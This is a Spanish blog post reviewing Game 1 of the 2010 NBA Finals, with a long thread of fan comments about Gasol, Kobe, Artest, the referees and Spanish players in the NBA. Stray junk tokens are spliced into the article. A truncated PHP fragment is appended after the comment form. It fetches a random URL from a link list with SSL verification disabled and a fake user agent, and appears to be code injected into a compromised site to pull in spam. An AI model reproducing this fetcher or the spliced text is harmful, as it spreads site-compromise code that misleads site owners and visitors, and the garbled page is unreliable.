Finales 2010 (1er partido): Vuelve la fiebre

04 de June de 2010 por TheDeerHunter

Ya saltaban chispas antes del salto inicial. Artest y Pierce se enfrascaban en la primera batalla de la serie que todavía no se había puesto en juego. Pocos instantes después continuaban con las hostilidades en una especie de combate de wrestling por un rebote intrascendente. El Lakers-Celtics se respira.

Será por el nivel de agresividad mostrado o por las manifestaciones de Jackson esta semana, los árbitros pusieron el listón como nunca lo habíamos visto en una finalísima. Al final del primer cuarto ya había 4 jugadores con problemas de faltas, de las que ya se habían señalado 21 en el minuto 3 del segundo cuarto. Después se pitarían otras que ni existieron lejanamente. El duelo se libraría anoche con el balón y con nada más.

pgaskgLa primera incógnita se desveló pronto. A día de hoy no hay duelo posible entre Gasol y Garnett. El nuestro estuvo imperial, casi dictatorial todo el partido delante y atrás. Garnett está evidentemente limitado. El que tuvo, retuvo, y KG aún es capaz de clavar algunos lanzamientos de 5-6 metros o marcarse alguna genialidad al poste bajo. Pero sufre cuando percute o es percutido y en cualquier desplazamiento. El resto de interiores no tiene jerarquía suficiente ni como para molestar. Sólo Rasheed lo puede intentar. Bynum sin estar los hizo polvo. Odom todavía no ha aparecido en esta final y lo peor es que no hizo falta.

Con árbitros o sin ellos, la defensa de Boston no se vio por ningún sitio. Casi podríamos decir que en esta ocasión el nivel físico lo puso Lakers. De hecho, en el primer cuarto, por exceso de reprise, se vieron obligados a jugar con Farmar, Brown y Vujacic, el trío kbrisesacapuntas. Pero ni contra ellos pudieron sacar ventaja los verdes. 25 puntos por cuarto se comieron. Lo firmaba ya mismo Jackson para toda la serie. Apostamos a que no sucederá así.

En ataque tampoco estuvieron finos. Hemos hablado de un Garnett bastante mediocre. Rondo tampoco tuvo su día, aun flotado por completo como antaño. Ray Allen empezó siendo un puñal pero duró muy poco en pista a base de faltas sobre Kobe. Sólo Pierce sacó durante un rato jugo del punto del arbitraje, hasta que Artest ajustó y se le hizo literalmente de noche. Grande otra vez el especialista defensivo amarillo. Un +26 con él en pista, con acciones memorables. Tampoco es muy normal que los Celtics estuvieran tan negadísimos desde la línea de 3.

Un dato más: Entre Kobe y Gasol estuvieron cerca de igualar (y en algunos aspectos lo lograron) la producción de todo el quinteto invencible de Boston. Artest, sobresaliente con Bynum y Fisher cumpliendo. Con esto bastó para inflingir mucho daño a los Celtics.

En definitiva, los Lakers ganaron más fácilmente de lo esperado. Los Celtics estuvieron bastante horrorosos, pero mostraron carácter aguantando el chaparrón prácicamente hasta los últimos 5 minutos, cuando lo normal en ese momento habría sido perder por 25.

De todas formas, sabemos que Rivers es posiblemente el mejor técnico ajustando de toda la competición y nos tiene reservadas muchas sorpresas todavía. Por mucho que la estadística diga que Phil Jackson ha ganado las 47 eliminatorias en las que su equipo ha ganado el primer partido, esto no ha hecho nada más que empezar.

PREMIOS

MVP: Forman la mejor pareja de la liga, y ante los Celtics lo volvieron a demostrar. 53 puntos, 21 rebotes, 9 asistencias, 4 tapones y el dominio en ambos lados de la cancha corrieron a cargo del dúo Bryant & Gasol.ronronpp

La sorpresa: Las Finales son territorio poco propicio para experimentos, de modo que lo que más nos sorprendió fue el arbitraje, extremadamente estricto. Se equivocaron en la señalización de contactos mínimos, pero al menos mantuvieron de forma bastante correcta el criterio en todo momento.

La decepción: Ray Allen tuvo la excusa de las faltas, con lo que las miradas deben dirigirse a un Garnett superado por Gasol y a los hombres de banquillo, incapaces de marcar diferencias. También falló de manera estrepitosa Odom, errático toda la noche.

El mayor esfuerzo en vano: Sin duda, el de Paul Pierce, lejos de sus brillantes actuaciones, controlado muy de cerca por Ron Artest, por capaz de encontrar vías para anotar 24 puntos además de liderar en rebotes a su equipo y repartir 4 asistencias.

PRÓXIMO PARTIDO

El segundo partido de las Finales se disputará la madrugada del domingo al lunes a las 2.00 horas.

Comenta

43 comentarios a esta entrada

  1. L.Casei dice:
    #1

    Que bueno lo de Jack Nicholson… que grande.
    Cuidado con Boston en el segundo partido. Si lo ganan, Lakers sufrirán en el TD Garden, seguro.

      Citar

  2. M dice:
    #2

    ¿Que hizo Nicholson? 🙂

      Citar

  3. MagicJohnson32 dice:
    #3

    Jack es nuestro auténtico 6º hombre, y no el tonto de Odom, jaja.

    Bueno, a mí me ha parecido que los Celtics no tienen el nivel físico para imponer su juego, como hicieron en 2008. Igual es un partido malo, pero no es ya por el juego sino por la impresión de que no llegan. Y si los Lakers, además del talento, van por delante en cuanto a intensidad, lucha y rebote, esto acabará rápido.

    Por supuesto, es sólo un partido, y si los Celts ganan el 2º el panorama cambiaría radicalmente. Pero Kobe, Pau y Artest parecieron demasiada tela que cortar para Boston.

    1 down, 3 to go!!!

      Citar

  4. TheDeerHunter dice:
    #4

    Bueno, para mí es evidente que en la plantilla de los Celtics no hay este año ningún PJ Brown, ningún Leon Powe, ningún Posey, House… aquellos hicieron un roto la otra vez. Yo creo que la diferencia es mucha frente a los Wallace, Davis, Allen y Robinson.
    No entiendo muy bien cómo hay gente que todavía asegura que los Celtics no han bajado mucho durante este tiempo o que la subida de Rondo compensa el bajón de Garnett (y en este caso el de la banca)

      Citar

  5. Akenaton dice:
    #5

    Yo creo que las faltas a Ray Allen influyeron muchísimo, no todas eran falta, y Ray es fundamental en estos Celtics, sin él, defenderles es mucho mucho más fácil. Yo creo que KG en el 2º partido volverá con más ganas. Conste que voy con Lakers, pero la ausencia de Ray fue, para mí, el factor clave.

    Muy bien Gasol

      Citar

  6. MagicJohnson32 dice:
    #6

    Ni todas las de Ray fueron, ni todas las de Kobe ni las de Fisher ni muchas otras. Los árbitros, sobre todo Crawford, dispararon a discreción y casi se cargan el partido.

    Bueno, Deer, después de ver a Boston pasar por encima de los dos mejores equipos de la regular season, había razones para verlos a un nivel altísimo ¿no?

      Citar

  7. TheDeerHunter dice:
    #7

    Las que todas no fueron falta fueron las que le beneficiaron a él. Que en una de ellas literalmente ni lo tocaron.
    No se cual de las que dices no fue falta. Igual la que Kobe lanza y Allen termina impactando su mano. No se suele pitar, pero eso no significa que deje de ser falta. No vi ninguna más dudosa en su caso.

    Desde luego que las faltas de Allen fueron decisivas, porque al principio era el que veía aro con facilidad, pero la defensa sobre Kobe de hace dos años no se vió por ningún lado. A poco que Kobe se hubiera empeñado más creo que los dos Allen hubieran terminado eliminados. No sé porqué no los forzó más en el tercer cuarto.
    Me hubiera gustado ver a Robinson o Rondo defendiéndole. Porque está claro que en Finley no confía ni diox.

      Citar

  8. TheDeerHunter dice:
    #8

    Desde luego, Magic, que se esperaba un nivel alto… y todavía se espera.
    Yo hablo del nivel físico de aquel banco y de éste. No me parece en ningún caso lo mismo el animal de Powe (entonces) o cómo llegó a jugar Posey que Davis y Toni Allen, sin prentender quitarles méritos.
    Y Robinson anoche me causó una impresión penosa. Nada que envidiar a Vujacic en eso.

      Citar

  9. Akenaton dice:
    #9

    Sí, estoy de acuerdo en que dispararon a discreción, pero al que peor le fue fue a Allen, porque se cargó rápido y cada vez que volvía le volvían a pitar otra muy dudosa, vuelta a sentarse, vuelta al parquet, y otra vez falta dudosa. El otro Allen no abre espacios y permite ayudas de los Lakers, sin hablar de triples.

    En el 2º cuarto se tranquilizaron un poquito, pero yo en el primero tb temí por el partido jeje.

      Citar

  10. Óscar dice:
    #10

    Aunque muchos pensábamos que con Artest los Lakers no serían mejores que con Ariza, se puede decir a estas alturas que sí lo son, al menos cuando llegan los Playoffs. Lo cual no quiere decir que sigamos pensando que Trevor es un grandísmo jugador, incluso a nivel anotador, como demostró en los Rockets en la primera mitad de temporada, y que además tiene mucho margen para seguir creciendo. Pero Ron sí era la pieza que necesitaban para ser aún mejores, más sólidos y con más experiencia. Si además las está enchufando desde fuera…
    Pensar en el equipo que puede tener Houston si renueva a Scola y Yao vuelve para ser el mismo: Brooks-Martin-Ariza-Scola-Ming // Lowry-Budinger-Battier-Hill-Hayes // más Taylor, Jared Jeffries (?), Andersen,… Y Llull en la recámara y una elección muy alta en el Draft (#14), por la que se pueden hacer con un jugador tipo Xavier Henry, Orton, Udoh, Motiejunas… Unos Rockets para echarse a temblar.
    He pensado en un “trade” con Portland si finalmente Rudy fuerza su salida: cambiarlo por Budinger, a pelo. Podría ser bueno para ambos equipos: los Blazers se harían con un 2/3 más atlético y alto que Rudy, mejor defensor y muy buen tirador. Los Rockets pueden querer a alguien como Fernández, escolta que pueda cambiar el ritmo o la dinámica del partido y gran tirador (perfil que cumplía Von Wafer en 2008/09, antes de irse a Grecia). Con Adelman podría encontrarse a gusto, pero no creo que jugase más minutos que con McMillan, ya que tienen a Kevin Martin, Ariza y Battier para ls puestos de escolta/alero…
    Yo estoy convencido de que si llega Claver este verano a Oregón, Rudy volvería a ser el mismo que el de su año rookie, cuando estaba Sergio. Parece ser cuestión simplemente de sentirse a gusto, acompañado, ya que este año sin su familia (la madre sobre todo) y con las lesiones se le ha hecho muy dura y larga la temporada. Ojalá siga en Portland, aunque sólo sea para que sigan poniendo muchos partidos en D+…

      Citar

  11. TheDeerHunter dice:
    #11

    Claver con McMillan… tiemblo

      Citar

  12. univerzee dice:
    #12

    The Deer, me paso por tu casa para decir que leyéndote creía que lo había escrito yo… pero no, lo has escrito tu. Totalmente de acuerdo en todo… si acaso una cosita pequeña que no va a ser de tu gusto creo… no crees/creéis que KB hace el ridículo cuando el partido esta decidido pidiendo la bola al poste como si del mismísimo Barkley se tratara para… qué? para anotar un poco más que Gasol, para meter 30 puntos? A mi me parece ridículo la verdad, si hubiera sido Allen que le defendió un posteo en el ultimo minuto le arreo un garrotazo que se le quitan las ganas, y de paso me pitan una con todas las de la ley.
    Espero que los siguientes partidos no sean iguales, mi apuesta es LAL 4-2 pero BOS estuvo horrible en defensa y eso mermó todo su juego, después Rivers debe hacer un trabajo psicológico con Rondo para que se deje de hacer tonterías y tire aunque falle, eso es casi lo de menos, que falle, que tire y obligue a que le defiendan, si las mete mejor, sino desgastará a los interiores LAL que tendrán que rebotear, y por lo menos estará bien situado para impedir la transición/contrataque de LAL. Por otra parte KG no va a poder dar más de si, primero por el, y segundo porque Gasol es muy superior a el, más que nunca el fuera sobre Gasol. Se jugó una media vuelta y la metió, una, ahí acabaron sus rodillas, y un mate… y ahí acabó todo su físico. Y gracias por nombrar a Artest, y su +26 que no es moco de pavo… no se llevará el MVP pero es clave en estas finales. Saludos!

      Citar

  13. TheDeerHunter dice:
    #13

    Artest lleva siendo clave todos los playoffs aunque mucha gente todavía no se haya dado cuenta. Sus defensas no las haría Ariza ni empapado de pastillacas.

    El tema Kobe al poste… a mí no me parece rídiculo. El juego al poste de Kobe ha sido posiblemente su mayor mejora de este curso. Es un arma que me atrevería a asegurar que la adquirió a partir de la lesión del dedo, que por momentos le molestó la mecánica de tiro y el rango… aunque también ha terminado solucionándolo. Ha trabajado mucho ese aspecto y la ha empleado mucho este año. Con bastante éxito bajo mi punto de vista (aunque todavía no es Jordan por ahí)

    Además, con Bynum lesionado y Odom missing creo que lo empleó con mucha cabeza. Sacando muchas faltas a todo dios (cómo no) y liberando a Pau de algunos marrones al poste contrario… porque lo cierto es que Bynum no se movió muy bien al respecto y Odom, como digo, no postea casi jamais anoche mucho menos. El triángulo tiene que tener dos vértices…

    Si acaso te diría al contrario. A mitad del tercer cuarto, con los Allen con 4 cada uno tendría que haberse viciado a comer bola y a forzar faltas. No lo hizo totalmente bien en ese sentido.
    En definitiva me parece que no estuvo brillante, se equivocó algunas veces y con algunas lecturas. Pero lo vi bastante suelto en ataque y es mucho más de lo que pudimos decir durante todas las finales del 2008.

      Citar

  14. univerzee dice:
    #14

    The, léeme, espero haberlo escrito bien… ponerse a postear como un poseso el sólo de lado a lado de la zona con Gasol a 6,70 cuando quedan 1minuto y medio y el partido esta solucionado… es en ese momento cuando para mi esta haciendo el ridículo pidiendo la bola como un crío al que le faltan dos puntos para hacer su record de anotación y tiene a la familia viéndolo.

      Citar

  15. Love Denise dice:
    #15

    No mucho mas que decir, la cronica de Deer lo resume bastante bien.
    Me ha hecho gracia lo del trio sacapuntas, ahora, el peor de lakers para mí es Walton, que pena que este tipo vaya camino de conseguir su 2º anillo.
    Alguién ha dicho algo de Claver…Pues para mí el valenciano ahora mismo es un pufo de cuidado para jugar en la NBA, vamos que si se marcha a Blazers no creo que rasque bola.
    Si se marcha y no juega (que sería lo normal), ya empezaría la gente a echarle la culpa a Mcmillan y la manía que le tiene a los españoles y tal y cual…entre otras bobadas..

      Citar

  16. Love Denise dice:
    #16

    y si Rudy juega mal porque no hay un compatriota a su lado…apaga y vamonos y que se vaya a su casa. Que está en la NBA donde el equipo se lo pone todo por delante, dandole todo lo que necesita para adaptarse a la ciudad y cobrando un pastón, que no está perdido en Siberia trabajando 8 horas en una mina ganando 400 €

      Citar

  17. TheDeerHunter dice:
    #17

    No te había entendido, perdona Uni…
    Perdona, el detalle no lo observé… quizás mi mente estaba en otras cosas. Hay cosas de Kobe que no nos gustarán nunca. Pero creo que van en el lote. Ese hambre, esa ambición es lo que le han llevado a matarse por progresar… cuando muchos en su caso hubieran sesteado desde hace mucho.
    Elegante no es, desde luego… pero ese detalle a Pau yo creo que se la trufa por completo. El mejor ayer fue él y punto.

      Citar

  18. Óscar dice:
    #18

    Totalmente de acuerdo, LoveDenise, en lo de McMillan.
    En cuanto a Claver, ni mucho menos es un pufo, por algo lo eligieron tan alto. Por sus condiciones, yo creo que cumplirá bien, pero quizás no el primer año. Puede hacer de todo: defensa, rebote (ofensivo sobre todo), envergadura, corre bien para un 2,07, sabe penetrar, buen tiro a 3/4 metros. Aunque aquí juega de “3”, tiene la ventaja de poder jugar de “4”.
    Eso sí, tiene que aprender a jugar más duro y mejorar el tiro de larga distancia. Para mí tiene un gran potencial (21 años) y espero que llegue esta temporada ya a los Blazers, aunque sea sólo para que Rudy (si sigue) se sienta otra vez como en casa. También dependerá de las elecciones del Draft o de si traspasan a jugadores como Webster o Cunningham (ojalá que no). En ese caso, podría incluso entrar en la rotación ya como rookie. Al menos los scouters y staff de Blazers siempre han dicho que cuentan con él, y a corto plazo.

      Citar

  19. TheDeerHunter dice:
    #19

    @LDenise… me pasa contigo como con otro colega que se ha empeñado en rajar de Fisher (con la que está cayendo)
    Por no seguir tanto a este equipo no conocéis el todo de estos jugadores. La lástima podría ser que los vaya a ganar Vujacic, ganando un pastizal que no merece y no se esfuerza por merecer… pero el caso de Walton es completamente distinto. Y lo poco que ha jugado en el anterior anillo y en este ha producido, y esto es mucho más de lo que pueden decir otros jugadores que cobran como estrellas y que han naufragado como piltrafas.

    Creeme que preferiría tirar 7 kilos en un tipo con la honradez de Walton que 18 en alguien como Rashard Lewis.

      Citar

  20. TheDeerHunter dice:
    #20

    No entiendo porqué se nombra a McMillan en un post de las finales.
    Dudo mucho que las vaya a oler en su puñetera vida.

    Ya hablaremos de él cuando toque el tema de los barraqueros, de los sistemas monotemáticos y del baloncesto como herramienta favorecedora del sueño.

      Citar

  21. MagicJohnson32 dice:
    #21

    LUUUUUUUUUKE!!

    Ayer vestí su camiseta, con un par, jeje.

      Citar

  22. kantonyo dice:
    #22

    Love, de verdad crees que Rudy está ganando más dinero en la NBA que lo que ganaría en Europa??? creo que estas muy equivocado…

      Citar

  23. MagicJohnson32 dice:
    #23

    Joer, si de largo el que más busca a Pau en los Lakers es Kobe…

      Citar

  24. Óscar dice:
    #24

    Lo de Rudy no lo digo yo, no ha hecho más que repetirlo él todo el año, que se siente solo, que añora a la familia y los amigos, que no sabe qué le pasa, etc. Todo depende de la madurez y la fortaleza mental que tengas, y ese parece que no es el fuerte de Rudy…

      Citar

  25. Kiki dice:
    #25

    VIVA McMILLAN !!

      Citar

  26. TheDeerHunter dice:
    #26

    Lo que le pasa a Rudy es que está hasta las narices que hasta el defunto Blake le ganara en minutos como escolta.
    Ahora… que dos playoffs seguidos rezando para que Rudy le salve el culo de barraquero, haciéndolo jugar más que nadie.
    Tiene cojones la cosa con el excelentísimo gestor de plantillas.

      Citar

  27. univerzee dice:
    #27

    Lo de Rudy llorando me hace una gracia tremenda. Tanto presumir de ÑBA de faltarse con cualquier americano que viene del otro lado del charco porque no se adapta al idioma o no se adapta al juego o no entiende nuestra manera de vivir, y ahora vamos consolando al chico porque se siente solo, vaya por dios!! Que eso lo dijera FMartin que cuando se fue Portland estaba más lejos que hoy en día Jupiter, que no habia internet ni móviles y encima te retirabas para toda la vida de la selección, el alli sin la familia sólo y con un ingles paparruchero, pues vale pero que lo diga este ahora, sabiendo el idioma… porque los tiempos ACB son en ingles, con internet, con los móviles, con los viajes en avión a peseta, con la hermana haciéndole visitas con los padres… vamos, que le manden un loro que le haga compañía.

      Citar

  28. Love Denise dice:
    #28

    @Oscar: Claver podrá ser bueno, quizas en un futuro, ahora mismo agitaría toallas en Portland. Además tiene un caracter demasiado frío, y en momentos de la verdad, se abaja los pantalones y se pone en cuclillas, es decir, se caga. Como ejemplo, los 2 partidos vs Unicaja, que han sido bastante apretados, cada vez que le pasaban la pelota, la pasaba, no hacía ni un amago de crear una jugada, o tirar. Conclusión: en mi opinion esta muyyyy verde.
    @deer: Idem para Vujacic tambien, otro pufo
    Deer, no conozco a Walton personalmente para saber si es honrado, lo que si conozco (en mi opinion) es que no tiene ninguna cualidad para jugar, y su contrato es totalmente desproporcionado a lo que produce.
    Lewis creo que cobra más de 18 kilos:), por si eran pocos

      Citar

  29. Love Denise dice:
    #29

    “””No entiendo porqué se nombra a McMillan en un post de las finales.Dudo mucho que las vaya a oler en su puñetera vida.””” jejejejeje.

    Magic johnson si de verdad tienes la camsieta de Luke, supongo que será el peor error cometido en tu vida:)

    kantonyo, con “pastón” me refería con respecto a un ciudadano normal. Alguien de aqui gana 1 millon de €?
    “Compradle un loro” jejjejjejje

      Citar

  30. TheDeerHunter dice:
    #30

    Enumero virtudes de Luke Walton:
    -Conocimiento completo de los sistemas del triángulo ofensivo, tanto así que se ha llegado a valorar su puesto como asistente si finalmente no terminaba de recuperarse físicamente. Será asistente y será entrenador de cierto éxito a mí no me cabe ninguna duda.
    – Gran pasador, gran visión de juego.
    – Inteligente en ataque y en defensa. Pocas veces se extralimita y siempre ofrece todo lo que tiene.
    – Trabajador incansable y disciplinado.
    – Hace grupo.
    – Las suele clavar cuando está sólo.

    Teniendo simplemente estas virtudes se puede triunfar con Phil Jackson.

    Sólo sus problemas físicos le han apartado de ser más importante para este equipo.

      Citar

  31. MagicJohnson32 dice:
    #31

    Walton lleva dos años en que no está al nivel físico para jugar, pero de ahí a decir que no tiene ninguna cualidad…

      Citar

  32. MagicJohnson32 dice:
    #32

    LOVE, no es la camiseta de juego. Es una amarilla, con el logo de los Lakers por delante y el dorsal 4 y “LUUUUUUUKE” en la espalda, jeje. No, mi próxima camiseta de juego será de Fisher, sin duda!!

      Citar

  33. Viva_Dirk dice:
    #33

    Vale que Walton mas o menos mola, pero que cobra demasiado es un hecho.

    Aunque vaya ahora mismo me importa todo eso mas bien poco, jeje.

      Citar

  34. PIRATA dice:
    #34

    Te faltaba el apellido, SKYWALKER, no???

      Citar

  35. kantonyo dice:
    #35

    La cuestión no es que nosotros podamos ganar 1 millon de dolares, la cuestión es que si alguno de nosotros elegiriamos estar en un sitio lejos de nuestra familia perdiendo 2 millones de dolares al año… Por eso no me queda claro que Rudy esté ganando 1 millon de dolares, mas bien creo que está perdiendo 2 millones como mínimo.

      Citar

  36. PIRATA dice:
    #36

    Dejando de ganar más que perdiendo……

      Citar

  37. Marcaco dice:
    #37

    no entiendo a estas alturas de la vida como pueden salir tanto vujacic como brown con tanta ansiedad a la pista… me ponen enfermo…
    Y tema LUKE. Yo creo q la inteligencia y lectura del juego que tiene, solo las supera Pau en LAL. El tema son las lesiones, pero antaño recuerdo buenos partidos de Walton. Cuando tenia continuidad y el fisico se lo permitia.

    En cuanto a C’s… no me fio un pelo… Un mal partido y conociendo als pajaras de LA… el partido del domingo puede ser la clave….

      Citar

  38. Love Denise dice:
    #38

    la cuestión, kantonyo, es que Rudy cuando se fue a Portland era consciente de que en los próximos 5 años iba a ganar menos de lo que ganaría en Europa, por tanto no debería quejarse de eso, además…que puede hacer con 3 kilos que no pueda hacer con 1?. No creo que esté loco por venirse a Europa por motivos económicos unica y exclusivamente…,

    joer, al final va a resultar que Walton es un crack; Para cerrar el tema de Walton por mi parte, pienso que con el se cumple el refrán de…”más vale caer en gracia que ser gracioso”. No se si tener ese ilustre apellido y ser el “hijo de……Bill” le habrá ayudado en eso

      Citar

  39. TheDeerHunter dice:
    #39

    Desde luego ante los aficionados de los Lakers ni de coña

      Citar

  40. TheDeerHunter dice:
    #40

    Ha fallecido John Wooden, campeón entre campeones.
    Descanse en paz.

      Citar

  41. MagicJohnson32 dice:
    #41

    Mito.

      Citar

  42. Love Denise dice:
    #42

    Segun Marca, Sergio Rodriguez ficha por el Madrid por 3 temporadas y 1’5 mill € por cada una…pero Messina y Sergio juntos?, son muy estilos opuestos.

      Citar

  43. Txusma dice:
    #43

    Vaya cortina de humo para intentar tapar el fracaso…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>